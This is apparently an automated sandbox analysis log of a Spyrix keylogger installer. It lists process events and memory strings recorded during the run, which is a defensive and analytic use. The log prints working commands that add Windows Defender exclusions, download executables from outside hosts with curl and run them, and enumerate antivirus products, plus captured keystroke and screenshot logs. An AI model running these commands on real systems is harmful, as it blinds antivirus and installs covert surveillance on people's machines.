Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

Uses taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F

Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager02 00:13:12.87
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AC6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},tch:1;
Source: spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:12.877ge
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000038.00000003.2640892122.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000002.2753080685.0000000007646000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: spkl.exe, 00000038.00000002.2691175840.0000000000A84000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@DOF_PROGMAN
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: I2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000002.2726418979.0000000001755000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +2024-10-02 00:13:12.877{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;userd"
Source: spkl.exe, 00000038.00000002.2746048085.0000000004F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:13:12.877{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}31"}
Source: spkl.exe, 00000038.00000002.2746632236.0000000006621000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}t"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000038.00000002.2746632236.00000000065BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: t{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000038.00000002.2746632236.0000000006500000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: i{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}anel
Source: spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CPRG_STAT;45567.0091449884;explorer.exe;Program Manager;[0,0];userP
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:10.12700"
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user"1
Source: spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}"
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user","SNode":"PRG_STAT","Reserved1":"0"}
Source: spkl.exe, 00000038.00000002.2753080685.00000000076C4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: yboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}
Source: spkl.exe, 00000038.00000002.2758244726.00000000088C6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2745442098.0000000004D80000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: {"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":[{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]}
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}zationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\\Windows\\crx --single-argument https://dashboard.spyrix.com/";ert}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: explorer.exe;Program Manager
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managert Print to PDF
Source: spkl.exe, 00000038.00000002.2746632236.0000000006621000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: V{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager",0s6s
Source: spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user","SNode":"PRG_STAT","Reserved1":"0"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661525411.000000000175A000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2742570837.0000000004556000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000003.2661525411.000000000175A000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726418979.000000000175B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}**
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}tionClassName = "Win32_ComputerSystem";
